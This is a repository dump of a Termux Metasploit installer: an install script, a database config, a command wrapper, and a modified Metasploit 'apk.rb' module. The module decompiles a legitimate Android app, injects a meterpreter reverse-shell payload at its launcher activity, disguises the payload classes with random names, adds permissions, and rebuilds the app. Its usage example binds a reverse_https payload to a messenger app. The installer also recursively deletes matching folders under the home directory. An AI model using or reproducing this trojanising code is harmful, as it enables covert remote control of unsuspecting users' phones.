├── database.yml ├── README.md ├── msfconsole ├── metasploit.sh └── apk.rb /database.yml: -------------------------------------------------------------------------------- 1 | production: 2 | adapter: postgresql 3 | database: msf_database 4 | username: msf 5 | password: msf 6 | host: 127.0.0.1 7 | port: 5432 8 | pool: 75 9 | timeout: 5 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### STEPS FOR METASPLOIT 2 | 1. download the script in HOME directory `wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh` 3 | 2. run `chmod +x metasploit.sh && ./metasploit.sh` 4 | 5 | -------------------------------------------------------------------------------- /msfconsole: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/sh 2 | SCRIPT_NAME=$(basename "$0") 3 | METASPLOIT_PATH="${HOME}/metasploit-framework" 4 | 5 | case "$SCRIPT_NAME" in 6 | msfconsole|msfvenom) 7 | exec ruby "$METASPLOIT_PATH/$SCRIPT_NAME" "$@" 8 | ;; 9 | *) 10 | echo "[!] Unknown Metasploit command '$SCRIPT_NAME'." 11 | exit 1 12 | ;; 13 | esac 14 | -------------------------------------------------------------------------------- /metasploit.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | 3 | # Remove Old Folder if exist 4 | find $HOME -name "metasploit-*" -type d -exec rm -rf {} \; 5 | 6 | 7 | cwd=$(pwd) 8 | msfvar=6.1.21 9 | msfpath='/data/data/com.termux/files/home' 10 | 11 | apt update && apt upgrade 12 | 13 | apt install -y binutils libiconv zlib autoconf bison clang coreutils curl findutils git apr apr-util libffi libgmp libpcap postgresql readline libsqlite openssl libtool libxml2 libxslt ncurses pkg-config wget make ruby libgrpc termux-tools ncurses-utils ncurses unzip zip tar termux-elf-cleaner 14 | # Many phones are claiming libxml2 not found error 15 | ln -sf $PREFIX/include/libxml2/libxml $PREFIX/include/ 16 | 17 | cd $msfpath 18 | curl -LO https://github.com/rapid7/metasploit-framework/archive/refs/tags/$msfvar.tar.gz 19 | 20 | tar -xf $msfpath/$msfvar.tar.gz 21 | mv $msfpath/metasploit-framework-$msfvar $msfpath/metasploit-framework 22 | cd $msfpath/metasploit-framework 23 | 24 | # Update rubygems-update 25 | #if [ "$(gem list -i rubygems-update 2>/dev/null)" = "false" ]; then 26 | # gem install --no-document --verbose rubygems-update 27 | #fi 28 | 29 | # Update rubygems 30 | #update_rubygems 31 | 32 | # Install bundler 33 | #gem install --no-document --verbose bundler:1.17.3 34 | gem install bundler 35 | 36 | # Installing all gems 37 | #bundle config build.nokogiri --use-system-libraries 38 | gem install nokogiri -v 1.12.5 -- --use-system-libraries 39 | bundle install 40 | echo "Gems installed" 41 | 42 | # Some fixes 43 | sed -i "s@/etc/resolv.conf@$PREFIX/etc/resolv.conf@g" $msfpath/metasploit-framework/lib/net/dns/resolver.rb 44 | find "$msfpath"/metasploit-framework -type f -executable -print0 | xargs -0 -r termux-fix-shebang 45 | find "$PREFIX"/lib/ruby/gems -type f -iname \*.so -print0 | xargs -0 -r termux-elf-cleaner 46 | 47 | echo "Creating database" 48 | 49 | mkdir -p $msfpath/metasploit-framework/config && cd $msfpath/metasploit-framework/config 50 | curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/database.yml 51 | 52 | mkdir -p $PREFIX/var/lib/postgresql 53 | pg_ctl -D "$PREFIX"/var/lib/postgresql stop > /dev/null 2>&1 || true 54 | 55 | if ! pg_ctl -D "$PREFIX"/var/lib/postgresql start --silent; then 56 | initdb "$PREFIX"/var/lib/postgresql 57 | pg_ctl -D "$PREFIX"/var/lib/postgresql start --silent 58 | fi 59 | if [ -z "$(psql postgres -tAc "SELECT 1 FROM pg_roles WHERE rolname='msf'")" ]; then 60 | createuser msf 61 | fi 62 | if [ -z "$(psql -l | grep msf_database)" ]; then 63 | createdb msf_database 64 | fi 65 | 66 | rm $msfpath/$msfvar.tar.gz 67 | 68 | cd ${PREFIX}/bin && curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/msfconsole && chmod +x msfconsole 69 | 70 | ln -sf $(which msfconsole) $PREFIX/bin/msfvenom 71 | 72 | echo "you can directly use msfvenom or msfconsole rather than ./msfvenom or ./msfconsole." 73 | -------------------------------------------------------------------------------- /apk.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | require 'msf/core' 4 | require 'rex/text' 5 | require 'tmpdir' 6 | require 'nokogiri' 7 | require 'fileutils' 8 | require 'optparse' 9 | require 'open3' 10 | require 'date' 11 | 12 | class Msf::Payload::Apk 13 | 14 | def print_status(msg='') 15 | $stderr.puts "[*] #{msg}" 16 | end 17 | 18 | def print_error(msg='') 19 | $stderr.puts "[-] #{msg}" 20 | end 21 | 22 | alias_method :print_bad, :print_error 23 | 24 | def usage 25 | print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" 26 | print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" 27 | end 28 | 29 | def run_cmd(cmd) 30 | begin 31 | stdin, stdout, stderr = Open3.popen3(cmd) 32 | return stdout.read + stderr.read 33 | rescue Errno::ENOENT 34 | return nil 35 | end 36 | end 37 | 38 | # Find a suitable smali point to hook 39 | def find_hook_point(amanifest) 40 | package = amanifest.xpath("//manifest").first['package'] 41 | application = amanifest.xpath('//application') 42 | application_name = application.attribute("name") 43 | if application_name 44 | return application_name.to_s 45 | end 46 | activities = amanifest.xpath("//activity|//activity-alias") 47 | for activity in activities 48 | activityname = activity.attribute("targetActivity") 49 | unless activityname 50 | activityname = activity.attribute("name") 51 | end 52 | category = activity.search('category') 53 | unless category 54 | next 55 | end 56 | for cat in category 57 | categoryname = cat.attribute('name') 58 | if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') 59 | name = activityname.to_s 60 | if name.start_with?('.') 61 | name = package + name 62 | end 63 | return name 64 | end 65 | end 66 | end 67 | end 68 | 69 | def parse_manifest(manifest_file) 70 | File.open(manifest_file, "rb"){|file| 71 | data = File.read(file) 72 | return Nokogiri::XML(data) 73 | } 74 | end 75 | 76 | def fix_manifest(tempdir, package, main_service, main_broadcast_receiver) 77 | #Load payload's manifest 78 | payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml") 79 | payload_permissions = payload_manifest.xpath("//manifest/uses-permission") 80 | 81 | #Load original apk's manifest 82 | original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml") 83 | original_permissions = original_manifest.xpath("//manifest/uses-permission") 84 | 85 | old_permissions = [] 86 | add_permissions = [] 87 | 88 | original_permissions.each do |permission| 89 | name = permission.attribute("name").to_s 90 | old_permissions << name 91 | end 92 | 93 | application = original_manifest.xpath('//manifest/application') 94 | payload_permissions.each do |permission| 95 | name = permission.attribute("name").to_s 96 | unless old_permissions.include?(name) 97 | add_permissions += [permission.to_xml] 98 | end 99 | end 100 | add_permissions.shuffle! 101 | for permission_xml in add_permissions 102 | print_status("Adding #{permission_xml}") 103 | if original_permissions.empty? 104 | application.before(permission_xml) 105 | original_permissions = original_manifest.xpath("//manifest/uses-permission") 106 | else 107 | original_permissions.before(permission_xml) 108 | end 109 | end 110 | 111 | application = original_manifest.at_xpath('/manifest/application') 112 | receiver = payload_manifest.at_xpath('/manifest/application/receiver') 113 | service = payload_manifest.at_xpath('/manifest/application/service') 114 | receiver.attributes["name"].value = package + '.' + main_broadcast_receiver 115 | receiver.attributes["label"].value = main_broadcast_receiver 116 | service.attributes["name"].value = package + '.' + main_service 117 | application << receiver.to_xml 118 | application << service.to_xml 119 | 120 | File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml } 121 | end 122 | 123 | def parse_orig_cert_data(orig_apkfile) 124 | orig_cert_data = Array[] 125 | keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile '#{orig_apkfile}'") 126 | owner_line = keytool_output.match(/^Owner:.+/)[0] 127 | orig_cert_dname = owner_line.gsub(/^.*:/, '').strip 128 | orig_cert_data.push("#{orig_cert_dname}") 129 | valid_from_line = keytool_output.match(/^Valid from:.+/)[0] 130 | from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip 131 | to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip 132 | from_date = DateTime.parse("#{from_date_str}") 133 | orig_cert_data.push(from_date.strftime("%Y/%m/%d %T")) 134 | to_date = DateTime.parse("#{to_date_str}") 135 | validity = (to_date - from_date).to_i 136 | orig_cert_data.push("#{validity}") 137 | return orig_cert_data 138 | end 139 | 140 | def backdoor_apk(apkfile, raw_payload) 141 | unless apkfile && File.readable?(apkfile) 142 | usage 143 | raise RuntimeError, "Invalid template: #{apkfile}" 144 | end 145 | 146 | #keytool=run_cmd("keytool")unlesskeytool!=nilraiseRuntimeError,"keytool not found. iIf it's not in your PATH, please add it."end 147 | 148 | #jarsigner = run_cmd("jarsigner")unless jarsigner != nilraise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it."end 149 | 150 | #zipalign = run_cmd("zipalign")unless zipalign != nilraise RuntimeError, "zipalign not found. If it's not in your PATH, please add it."en 151 | 152 | #apktool = run_cmd("apktool -version") 153 | #unless apktool != nil 154 | # raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." 155 | #end 156 | 157 | # apk_v = Gem::Version.new(apktool) 158 | #unless apk_v >= Gem::Version.new('2.0.1') 159 | # raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." 160 | #end 161 | 162 | #Create temporary directory where work will be done 163 | tempdir = Dir.mktmpdir 164 | 165 | #keystore = "#{tempdir}/signing.keystore"torepass = "android"keypass = "androidkeyalias = "signing.key"orig_cert_data = parse_orig_cert_data(apkfile)orig_cert_dname = orig_cert_data[0]orig_cert_startdate = orig_cert_data[orig_cert_validity = orig_cert_data[2] 166 | 167 | print_status "Creating signing key and keystore..\n" 168 | #run_cmd("keytool -genkey -v -keystore{keystore} \alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \-keysize 2048 -startdate '#{orig_cert_startdate}' \mm-validity #{orig_cert_validity} -dname#{orig_cert_dname}'") 169 | 170 | File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } 171 | FileUtils.cp apkfile, "#{tempdir}/original.apk" 172 | 173 | print_status "Decompiling original APK..\n" 174 | run_cmd("apktool d -f -r --force-manifest #{tempdir}/original.apk -o #{tempdir}/original") 175 | print_status "Decompiling payload APK..\n" 176 | run_cmd("apktool d -f -r --force-manifest #{tempdir}/payload.apk -o #{tempdir}/payload") 177 | 178 | amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml") 179 | 180 | print_status "Locating hook point..\n" 181 | hookable_class = find_hook_point(amanifest) 182 | smalifile = "#{tempdir}/original/smali*/" + hookable_class.gsub(/\./, "/") + ".smali" 183 | smalifiles = Dir.glob(smalifile) 184 | for smalifile in smalifiles 185 | if File.readable?(smalifile) 186 | hooksmali = File.read(smalifile) 187 | break 188 | end 189 | end 190 | 191 | unless hooksmali 192 | raise RuntimeError, "Unable to find hook point in #{smalifile}\n" 193 | end 194 | 195 | entrypoint = 'return-void' 196 | unless hooksmali.include? entrypoint 197 | raise RuntimeError, "Unable to find hookable function in #{smalifile}\n" 198 | end 199 | 200 | # Remove unused files 201 | FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali" 202 | FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") 203 | 204 | package = amanifest.xpath("//manifest").first['package'] 205 | package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}" 206 | classes = {} 207 | classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize 208 | classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize 209 | classes['MainBroadcastReceiver'] = Rex::Text::rand_text_alpha_lower(5).capitalize 210 | package_slash = package.gsub(/\./, "/") 211 | print_status "Adding payload as package #{package}\n" 212 | payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali") 213 | payload_dir = "#{tempdir}/original/smali/#{package_slash}/" 214 | FileUtils.mkdir_p payload_dir 215 | 216 | # Copy over the payload files, fixing up the smali code 217 | payload_files.each do |file_name| 218 | smali = File.read(file_name) 219 | smali_class = File.basename file_name 220 | for oldclass, newclass in classes 221 | if smali_class == "#{oldclass}.smali" 222 | smali_class = "#{newclass}.smali" 223 | end 224 | smali.gsub!(/com\/metasploit\/stage\/#{oldclass}/, package_slash + "/" + newclass) 225 | end 226 | smali.gsub!(/com\/metasploit\/stage/, package_slash) 227 | newfilename = "#{payload_dir}#{smali_class}" 228 | File.open(newfilename, "wb") {|file| file.puts smali } 229 | end 230 | 231 | payloadhook = %Q^invoke-static {}, L#{package_slash}/#{classes['MainService']};->start()V 232 | 233 | ^ + entrypoint 234 | hookedsmali = hooksmali.sub(entrypoint, payloadhook) 235 | 236 | print_status "Loading #{smalifile} and injecting payload..\n" 237 | File.open(smalifile, "wb") {|file| file.puts hookedsmali } 238 | 239 | injected_apk = "#{tempdir}/output.apk" 240 | #aligned_apk = "#{tempdir}/aligned.apk" 241 | print_status "Poisoning the manifest with meterpreter permissions..\n" 242 | fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver']) 243 | 244 | print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk} and yes it's me guys...your friend Lokesh (Hax4Us) thanx for using my tool TMUX-BUNCH \n" 245 | print_status "Note :- this apk.rb script is written by Metasploit team (almost by my friend tim) and I am just a modifier of this script for binding payload in termux" 246 | run_cmd("apktool b --aapt $PREFIX/bin/aapt -o #{injected_apk} #{tempdir}/original") 247 | unless File.readable?(injected_apk) 248 | raise RuntimeError, "Unable to rebuild apk with apktool" 249 | end 250 | 251 | #print_status "Signing #{injected_apk}\n" 252 | #run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}") 253 | #print_status "Aligning #{injected_apk}\n" 254 | #run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}") 255 | 256 | #= File.read(aligned_apk) 257 | run_cmd("cp #{tempdir}/output.apk $HOME/Tmux-Bunch-Reborn/unsign") 258 | run_cmd("rm -rf #{tempdir}") 259 | #outputapk 260 | end 261 | end 262 | 263 | 264 | --------------------------------------------------------------------------------